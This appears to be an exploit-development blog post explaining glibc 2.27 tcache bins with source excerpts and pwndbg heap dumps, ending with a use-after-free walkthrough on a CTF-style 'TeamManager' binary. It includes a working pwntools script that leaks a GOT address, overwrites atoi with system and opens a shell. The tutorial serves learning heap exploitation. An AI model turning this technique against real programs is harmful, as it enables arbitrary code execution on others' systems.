Introduction of Tcache bins in Heap management

The purpose of this blog post is to understand the implementation of Tcache bins from the perspective of exploit development, and intended for the people who already have some basic knowledge about heap. If you are already aware of some heap attacks on older version of glibc (< 2.26) it will be easy to understand to you. If you dont know anything about Heap, Please go through below mentioned link:

Introduction

A new caching mechanism called tcache (thread local caching) bins are introduced in glibc 2.26 in 2017. Purpose of adding this to heap management is to improve performance.

Whenever any chunks allocated or freed, the malloc algorithm will first look into tcache bins instead of traversing through fast, small, large or unsorted bins, which reduce the extra overhead from the malloc.

  • Note: All the below code snippet is with reference to the Glibc version 2.27.

The data structure for this bin is single linked list since in Tcache bins chunks are not removed from the middle of the list. Insertion and removal happens from the HEAD and hence LIFO behaviour.

Data structure of tcachebins

[  1]: 0x5555555596d0 —▸ 0x555555559670 ◂— 0x0
[  2]: 0x555555559730 ◂— 0x0
.....
.....
.....
[  7]: 0x5555555597a0 —▸ 0x5555555597c0 —▸ 0x555555559790 ◂— 0x0
.....
.....

Below is the actual structure of tcache_parthread_struct and tcache_entry. And the object/variable of this structure will be used later in the various tcache operations.

/* We overlay this structure on the user-data portion of a chunk when
   the chunk is stored in the per-thread cache.  */
 typedef struct tcache_entry
 {
   struct tcache_entry *next;
 } tcache_entry;

 /* There is one of these for each thread, which contains the
    per-thread cache (hence "tcache_perthread_struct").  Keeping
    overall size low is mildly important.  Note that COUNTS and ENTRIES
    are redundant (we could have just counted the linked list each
    time), this is for performance reasons.  */
 typedef struct tcache_perthread_struct
 {
   char counts[TCACHE_MAX_BINS];
   tcache_entry *entries[TCACHE_MAX_BINS];
 } tcache_perthread_struct;

How Tcache works:

There are Two functions added in modern libc for management of tcache bins, tcache_put and tcache_get.


/* Caller must ensure that we know tc_idx is valid and there's room for more chunks. */ static __always_inline void tcache_put (mchunkptr chunk, size_t tc_idx) { tcache_entry *e = (tcache_entry *) chunk2mem (chunk); assert (tc_idx < TCACHE_MAX_BINS); e->next = tcache->entries[tc_idx]; tcache->entries[tc_idx] = e; ++(tcache->counts[tc_idx]); } /* Caller must ensure that we know tc_idx is valid and there's available chunks to remove. */ static __always_inline void * tcache_get (size_t tc_idx) { tcache_entry *e = tcache->entries[tc_idx]; assert (tc_idx < TCACHE_MAX_BINS); assert (tcache->entries[tc_idx] > 0); tcache->entries[tc_idx] = e->next; --(tcache->counts[tc_idx]); return (void *) e; }

Both functions (tcache_put & tcache_get) are part of the _int_free and __libc_malloc respectively. When a program freed a chunk it will call a _int_free function and based on certian condition it will call tcache_put. The conditions are as:

  • The requested size of the allocated region is not greater than 0x408(1032 bytes).
  • Tcache bin that is appropriate for a given size is not full
#if USE_TCACHE
  {
    size_t tc_idx = csize2tidx (size);

    if (tcache
  && tc_idx < mp_.tcache_bins
  && tcache->counts[tc_idx] < mp_.tcache_count)
      {
  tcache_put (p, tc_idx);
  return;
      }
  }
#endif

A maximum number of chunks in one tcache bin is 7 by default and maximum number of tcache bins are 64.

/* This is another arbitrary limit, which tunables can change.  Each
   tcache bin will hold at most this number of chunks.  */
# define TCACHE_FILL_COUNT 7
#endif
/* We want 64 entries.  This is an arbitrary limit, which tunables can reduce.  */
# define TCACHE_MAX_BINS                64
#if USE_TCACHE
  ,
  .tcache_count = TCACHE_FILL_COUNT,
  .tcache_bins = TCACHE_MAX_BINS,
  .tcache_max_bytes = tidx2usize (TCACHE_MAX_BINS-1),
  .tcache_unsorted_limit = 0 /* No limit.  */
#endif

And when a program requests for a chunk, the malloc algorithm first check whether the chunk of the requested size is available there in tcache bins if yes then it will call tcache_get function, get the pointer to the chunk and return it to the program else do further processing.

if USE_TCACHE
  /* int_free also calls request2size, be careful to not pad twice.  */
  size_t tbytes;
  checked_request2size (bytes, tbytes);
  size_t tc_idx = csize2tidx (tbytes);

  MAYBE_INIT_TCACHE ();

  DIAG_PUSH_NEEDS_COMMENT;
  if (tc_idx < mp_.tcache_bins
      /*&& tc_idx < TCACHE_MAX_BINS*/ /* to appease gcc */
      && tcache
      && tcache->entries[tc_idx] != NULL)
    {
      return tcache_get (tc_idx);
    }
  DIAG_POP_NEEDS_COMMENT;
#endif


Ok this is enough for theory, lets do some practical demo

Demo

Two basic pwndbg command which helps to view Heap structure
Heap : Will give the list of allocated chunks first address.
bins : will display the current structure of various bins.

// Basic C program to allocate memory dynamically, lets called it tcache_test.c
// Compile: gcc -g -o tcache_test tcache_test.c

#include<stdio.h>
#include<stdlib.h>
#include<string.h>

int main(int argc, char * argv[])
{
  char *a, *arr[8];
  int i=0;
  for(i = 0 ; i < 3 ; i++)
  {
    arr[i] = malloc(0x20);
  }

  for(i = 3 ; i < 5 ; i++)
  {
    arr[i] = malloc(0x30);
  }

  for(i = 5 ; i < 7 ; i++)
  {
    arr[i] = malloc(0x40);
  }

  a = malloc(0x420);
  arr[8] = malloc(0x20);  // temporary chunk to prevent last chunk merging issue .
  free(a);

  for(i = 0 ; i < 7 ; i++)
  {
    free(arr[i]);
  }
}

> gdb tcache_test
> b * main + 198 (breakpoint at line# 29 )
> run
...
pwndbg> x/30gx 0x555555756250 (pointer of the first malloc - 0x10)
0x555555756250: 0x0000000000000000  0x0000000000000031
0x555555756260: 0x0000000000000000  0x0000000000000000
0x555555756270: 0x0000000000000000  0x0000000000000000
0x555555756280: 0x0000000000000000  0x0000000000000031
0x555555756290: 0x0000000000000000  0x0000000000000000
0x5555557562a0: 0x0000000000000000  0x0000000000000000
0x5555557562b0: 0x0000000000000000  0x0000000000000031
0x5555557562c0: 0x0000000000000000  0x0000000000000000
0x5555557562d0: 0x0000000000000000  0x0000000000000000
0x5555557562e0: 0x0000000000000000  0x0000000000000041
0x5555557562f0: 0x0000000000000000  0x0000000000000000
0x555555756300: 0x0000000000000000  0x0000000000000000
0x555555756310: 0x0000000000000000  0x0000000000000000
0x555555756320: 0x0000000000000000  0x0000000000000041
0x555555756330: 0x0000000000000000  0x0000000000000000

pwndbg> x/30gx 0x555555756340 (pointer of the sixth malloc - 0x20)
0x555555756340: 0x0000000000000000  0x0000000000000000
0x555555756350: 0x0000000000000000  0x0000000000000000
0x555555756360: 0x0000000000000000  0x0000000000000051
0x555555756370: 0x0000000000000000  0x0000000000000000
0x555555756380: 0x0000000000000000  0x0000000000000000
0x555555756390: 0x0000000000000000  0x0000000000000000
0x5555557563a0: 0x0000000000000000  0x0000000000000000
0x5555557563b0: 0x0000000000000000  0x0000000000000051
0x5555557563c0: 0x0000000000000000  0x0000000000000000
0x5555557563d0: 0x0000000000000000  0x0000000000000000
0x5555557563e0: 0x0000000000000000  0x0000000000000000
0x5555557563f0: 0x0000000000000000  0x0000000000000000
0x555555756400: 0x0000000000000000  0x0000000000000431
0x555555756410: 0x0000000000000000  0x0000000000000000
0x555555756420: 0x0000000000000000  0x0000000000000000

pwndbg> x/4gx 0x555555756830 (pointer of the sixth malloc - 0x10)
0x555555756830: 0x0000000000000000  0x0000000000000031
0x555555756840: 0x0000000000000000  0x0000000000000000

Observe that the total 9 chunks gets allocated in the heap out of which 4 are of size 0x30, 2 are of 0x40 , 2 are of 0x50 and 1 chunk with 0x430.

  • Note: malloc allocate a chunk with size including its metadata information and in multiple of 16 (as it is 64bit system)

Now, lets continue with GDB and as per code, all chunk should be freed and placed in appropriate bins.

> b * main + 265 (breakpoint before function complete)
continue

pwndbg> bins

tcachebins
0x30 [  3]: 0x5555557562c0 —▸ 0x555555756290 —▸ 0x555555756260 ◂— 0x0
0x40 [  2]: 0x555555756330 —▸ 0x5555557562f0 ◂— 0x0
0x50 [  2]: 0x5555557563c0 —▸ 0x555555756370 ◂— 0x0

fastbins
0x20: 0x0
0x30: 0x0
0x40: 0x0
0x50: 0x0
0x60: 0x0
0x70: 0x0
0x80: 0x0

unsortedbin
all: 0x555555756400 —▸ 0x7ffff7dcfca0 (main_arena+96) ◂— 0x555555756400

smallbins
empty
largebins
empty

Great, so as per our understanding all the chunk whose size is 0x408 is placed in unsorted bins.

After all chunks are free, lets see the actual heap layout.

pwndbg> x/30gx 0x555555756250
0x555555756250: 0x0000000000000000  0x0000000000000031
0x555555756260: 0x0000000000000000  0x0000000000000000
0x555555756270: 0x0000000000000000  0x0000000000000000
0x555555756280: 0x0000000000000000  0x0000000000000031
0x555555756290: 0x0000555555756260  0x0000000000000000
0x5555557562a0: 0x0000000000000000  0x0000000000000000
0x5555557562b0: 0x0000000000000000  0x0000000000000031
0x5555557562c0: 0x0000555555756290  0x0000000000000000
0x5555557562d0: 0x0000000000000000  0x0000000000000000
0x5555557562e0: 0x0000000000000000  0x0000000000000041
0x5555557562f0: 0x0000000000000000  0x0000000000000000
0x555555756300: 0x0000000000000000  0x0000000000000000
0x555555756310: 0x0000000000000000  0x0000000000000000
0x555555756320: 0x0000000000000000  0x0000000000000041
0x555555756330: 0x00005555557562f0  0x0000000000000000
pwndbg> x/32gx 0x555555756340
0x555555756340: 0x0000000000000000  0x0000000000000000
0x555555756350: 0x0000000000000000  0x0000000000000000
0x555555756360: 0x0000000000000000  0x0000000000000051
0x555555756370: 0x0000000000000000  0x0000000000000000
0x555555756380: 0x0000000000000000  0x0000000000000000
0x555555756390: 0x0000000000000000  0x0000000000000000
0x5555557563a0: 0x0000000000000000  0x0000000000000000
0x5555557563b0: 0x0000000000000000  0x0000000000000051
0x5555557563c0: 0x0000555555756370  0x0000000000000000
0x5555557563d0: 0x0000000000000000  0x0000000000000000
0x5555557563e0: 0x0000000000000000  0x0000000000000000
0x5555557563f0: 0x0000000000000000  0x0000000000000000
0x555555756400: 0x0000000000000000  0x0000000000000431
0x555555756410: 0x00007ffff7dcfca0  0x00007ffff7dcfca0
0x555555756420: 0x0000000000000000  0x0000000000000000
0x555555756430: 0x0000000000000000  0x0000000000000000
pwndbg> x/4gx 0x555555756830
0x555555756830: 0x0000000000000430  0x0000000000000030
0x555555756840: 0x0000000000000000  0x0000000000000000

You can compare the heap structure after free with the linked list of tcache bins list.

Now, if we add a last line into a program as below , compile and run it again you will observe that at the time of next allocation, malloc returns the pointer of first chunk from Tcache bins (malloc algorithm will first check that is any free chunk of requested size available in Tcache bin if so return the pointer).

printf("New malloc address: %p\n",malloc(0x20));

New malloc address: 0x5555557562c0

and updated Tcache bins:

pwndbg> bins
tcachebins
0x30 [  2]: 0x555555756290 —▸ 0x555555756260 ◂— 0x0
0x40 [  2]: 0x555555756330 —▸ 0x5555557562f0 ◂— 0x0
0x50 [  2]: 0x5555557563c0 —▸ 0x555555756370 ◂— 0x0
...
...

That is it in the introduction of Tcache bins lets do some exploit thing for fun 😀

Exploit for fun

Lets rewrite the old exploit Use after free in modern libc (glibc 2.27) .

Rewrite the exploit given in the articale as it will not work in modern environment due to implementation of tcache bins.

  • Application functionality: Please read the article to have better understanding of the challenge.

High-level overview:

The application is basically asking for choice to Add, Edit, Select, Show player and Show team.

Welcome to your TeamManager (TM)!
0.- Exit
1.- Add player
2.- Remove player
3.- Select player
4.- Edit player
5.- Show player
6.- Show team
Your choice: 

the structure of the a player will probably look like:

struct player {
     int32_t attack_pts;
     int32_t defense_pts;
     int32_t speed;
     int32_t precision;
     char *name;
}  

When a program request for chunk (player) from add_player code, the heap allocater allocates 2 chunk one with the size 0x20 (which includes 4 int32_t variables and pointer to name chunk) and second with the size of provided string for name

Lets add 3 player and see memory layout.

> Heap
.....
address of chunks
.....

pwndbg> x/30gx 0x604250
0x604250: 0x0000000000000000  0x0000000000000021
0x604260: 0x0000000100000001  0x0000000100000001
0x604270: 0x0000000000604280  0x0000000000000031
0x604280: 0x4141414141414141  0x4141414141414141
0x604290: 0x4141414141414141  0x0000414141414141
0x6042a0: 0x0000000000000000  0x0000000000000021
0x6042b0: 0x0000000200000002  0x0000000200000002
0x6042c0: 0x00000000006042d0  0x0000000000000031
0x6042d0: 0x4242424242424242  0x4242424242424242
0x6042e0: 0x4242424242424242  0x0000424242424242
0x6042f0: 0x0000000000000000  0x0000000000000021
0x604300: 0x0000000300000003  0x0000000300000003
0x604310: 0x0000000000604320  0x0000000000000031
0x604320: 0x4343434343434343  0x4343434343434343
0x604330: 0x4343434343434343  0x0000434343434343


So, total 6 chunk gets created 3 chunk with size 0x20 and 3 with size 0x30 created.

Here, in challenge to view the player info first we have to select an index of that player so lets select player 2 (index 1)

pwndbg> c
Continuing.
0.- Exit
1.- Add player
2.- Remove player
3.- Select player
4.- Edit player
5.- Show player
6.- Show team
Your choice: 3
Enter index: 1
Player selected!
  Name: BBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
  A/D/S/P: 2,2,2,2

Observe the memory layout of selected player which is point to heap memory for the second player

pwndbg> x/2gx 0x603170
0x603170 <selected>:  0x00000000006042b0  0x0000000000000000

Now, remove the second player that is index 1.

pwndbg> c
Continuing.
0.- Exit
1.- Add player
2.- Remove player
3.- Select player
4.- Edit player
5.- Show player
6.- Show team
Your choice: 2
Enter index: 1
She's gone!

Observe the heap layout for second player, the memory area of selected player and contents of bins.

pwndbg> x/10gx 0x6042a0
0x6042a0: 0x0000000000000000  0x0000000000000021
0x6042b0: 0x0000000000000000  0x0000000200000002
0x6042c0: 0x00000000006042d0  0x0000000000000031
0x6042d0: 0x0000000000000000  0x4242424242424242
0x6042e0: 0x4242424242424242  0x0000424242424242

pwndbg> x/2gx 0x603170
0x603170 <selected>:  0x00000000006042b0  0x0000000000000000

pwndbg> bins
tcachebins
0x20 [  1]: 0x6042b0 ◂— 0x0
0x30 [  1]: 0x6042d0 ◂— 0x0
fastbins
0x20: 0x0
0x30: 0x0
0x40: 0x0
0x50: 0x0
0x60: 0x0
0x70: 0x0
0x80: 0x0
unsortedbin
all: 0x0
smallbins
empty
largebins
empty

So as per our understanding of Tcache bins and free everything is fine except the value of selected global variable. That means even after removing the 2nd player, the selected global variable still points to the same player.

And if we select Show player menu, it will display the content of the second player, although its corrupted but gives us hint of Use After Free vulnerability.

Exploitation

Lets run the same binary again repeat first 2 steps,that is add 3 player and select 2nd player. After that remove all the player but in sequence (index 0,1,2) and observe the same thing we observed earlier.

pwndbg> x/30gx 0x604250
0x604250: 0x0000000000000000  0x0000000000000021
0x604260: 0x0000000000000000  0x0000000100000001
0x604270: 0x0000000000604280  0x0000000000000031
0x604280: 0x0000000000000000  0x4141414141414141
0x604290: 0x4141414141414141  0x0000414141414141
0x6042a0: 0x0000000000000000  0x0000000000000021
0x6042b0: 0x0000000000604260  0x0000000200000002
0x6042c0: 0x00000000006042d0  0x0000000000000031
0x6042d0: 0x0000000000604280  0x4242424242424242
0x6042e0: 0x4242424242424242  0x0000424242424242
0x6042f0: 0x0000000000000000  0x0000000000000021
0x604300: 0x00000000006042b0  0x0000000300000003
0x604310: 0x0000000000604320  0x0000000000000031
0x604320: 0x00000000006042d0  0x4343434343434343
0x604330: 0x4343434343434343  0x0000434343434343

pwndbg> x/2gx 0x603170
0x603170 <selected>:  0x00000000006042b0  0x0000000000000000

pwndbg> bins
tcachebins
0x20 [  3]: 0x604300 —▸ 0x6042b0 —▸ 0x604260 ◂— 0x0
0x30 [  3]: 0x604320 —▸ 0x6042d0 —▸ 0x604280 ◂— 0x0
fastbins
0x20: 0x0
0x30: 0x0
0x40: 0x0
0x50: 0x0
0x60: 0x0
0x70: 0x0
0x80: 0x0
unsortedbin
all: 0x0
smallbins
empty
largebins
empty

Can you find any memory leakage here ???? 🙂 Yes you are right, if we select a menu show player it will give us below output:

pwndbg&gt; c
Continuing.
0.- Exit
1.- Add player
2.- Remove player
3.- Select player
4.- Edit player
5.- Show player
6.- Show team
Your choice: 5
  Name: �B`
  A/D/S/P: 6308448,0,2,2

Now, if we add a chunk with the player name of 20 length, the algorithm will get the first two chunk from the Tcache bin of size 0x20. 1 for the structure of player and 1 for the name of the player.

pwndbg&gt; c
Continuing.
0.- Exit
1.- Add player
2.- Remove player
3.- Select player
4.- Edit player
5.- Show player
6.- Show team
Your choice: 1
Found free slot: 0
Enter player name: ZZZZZZZZZZZZZZZZZZZZ
Enter attack points: 4
Enter defense points: 4
Enter speed: 4
Enter precision: 4
...
...

--&gt; Observe the memory content:
pwndbg&gt; x/30gx 0x604250
0x604250: 0x0000000000000000  0x0000000000000021
0x604260: 0x0000000000000000  0x0000000100000001
0x604270: 0x0000000000604280  0x0000000000000031
0x604280: 0x0000000000000000  0x4141414141414141
0x604290: 0x4141414141414141  0x0000414141414141
0x6042a0: 0x0000000000000000  0x0000000000000021
0x6042b0: 0x5a5a5a5a5a5a5a5a  0x5a5a5a5a5a5a5a5a
0x6042c0: 0x000000005a5a5a5a  0x0000000000000031
0x6042d0: 0x0000000000604280  0x4242424242424242
0x6042e0: 0x4242424242424242  0x0000424242424242
0x6042f0: 0x0000000000000000  0x0000000000000021
0x604300: 0x0000000400000004  0x0000000400000004
0x604310: 0x00000000006042b0  0x0000000000000031
0x604320: 0x00000000006042d0  0x4343434343434343
0x604330: 0x4343434343434343  0x0000434343434343

--&gt; observe the beans.
pwndbg&gt; bins
tcachebins
0x20 [  1]: 0x604260 ◂— 0x0
0x30 [  3]: 0x604320 —▸ 0x6042d0 —▸ 0x604280 ◂— 0x0
fastbins
0x20: 0x0
0x30: 0x0
0x40: 0x0
0x50: 0x0
0x60: 0x0
0x70: 0x0
0x80: 0x0
unsortedbin
all: 0x0
smallbins
empty
largebins
empty

--&gt; Selected player still points to 2nd player
pwndbg&gt; x/2gx 0x603170
0x603170 :  0x00000000006042b0  0x0000000000000000

Please take a closer look above result we got, we have overwrite the name pointer of the 2nd player (index 1) with the value of our choice, so next time when we do show player it will give SEG FAULT error as it will try to get the value from the pointer but it contains invalid memory address 5a5a5a5a (ZZZZ in ascii).

What if format a name in such a way that the last 4 byte points to and address at GOT. Yes we are able to read the value at that pointer.
Great so now we have arbitrary read primitive. what we need now is write primitive.

Okay, there is one more functionality of the challenge that we have not discussed yet that is Edit player. Edit player allows us to edit the field of the player we have selected.

So, if we select the Edit player and enter the new value for name, it will ultimately do the arbitrary write as we are already controlling the pointer of name. Great we do have write primitive also. 😀

Exploit POC

from pwn import *
import os

def startProcess():
  p = process("./main.elf")
  #gdb.attach(p,'''b * add_player + 787
  #   b * delete_player + 237
  #   b * edit_player + 191''')
  return p

def alloc(p,name, attack = 1, defense = 2, speed = 3, precision = 4):

  p.recvuntil('choice: ')
  p.sendline('1')

  p.recvuntil('name: ')
  p.sendline(name)

  p.recvuntil('points: ')
  p.sendline(str(attack))

  p.recvuntil('points: ')
  p.sendline(str(defense))

  p.recvuntil('speed: ')
  p.sendline(str(speed))

  p.recvuntil('precision: ')
  p.sendline(str(precision))

def edit(p,name):

    p.recvuntil('choice: ')
    p.sendline('4')

    p.recvuntil('choice: ')
    p.sendline('1')

    p.recvuntil('name: ')
    p.sendline(name)

    p.recvuntil('choice: ')
    p.sendline('sh')

    return

def select(p,idx):

    p.recvuntil('choice: ')
    p.sendline('3')

    p.recvuntil('index: ')
    p.sendline(str(idx))

    return

def free(p,idx):

    p.recvuntil('choice: ')
    p.sendline('2')

    p.recvuntil('index: ')
    p.sendline(str(idx))

    return

def show(p):

    p.recvuntil('choice: ')
    p.sendline('5')

    return

def pwn(p):
    alloc(p,'A' * 0x30)
    alloc(p,'B' * 0x30)
    alloc(p,'C' * 0x30)
    select(p,1)
    free(p,0)
    free(p,1)
    free(p,2)

    atoi_got = 0x603110
    payload = 'Z'*8 * 2 + p64(atoi_got)
    alloc(p,payload)
    show(p)
    p.recvuntil('Name: ')

    leak        = u64(p.recv(6).ljust(8, '\x00'))
    system      = leak + 0xedc0

    p.info("Leaked address : " + hex(leak))
    p.info("System address : " + hex(system))

    edit(p,p64(system))
    p.info("Enter your system command now : ")
    p.interactive()

def main():
  p = startProcess()
  pwn(p)
  p.interactive()



main()

O/P

[+] Starting local process './main.elf': pid 16975
[\*] Leaked address : 0x7fd4cee0e680
[\*] System address : 0x7fd4cee1d440
[\*] Enter your system command now : 
[\*] Switching to interactive mode
$ uname
Linux

Leave a Reply

Your email address will not be published. Required fields are marked *

16 − thirteen =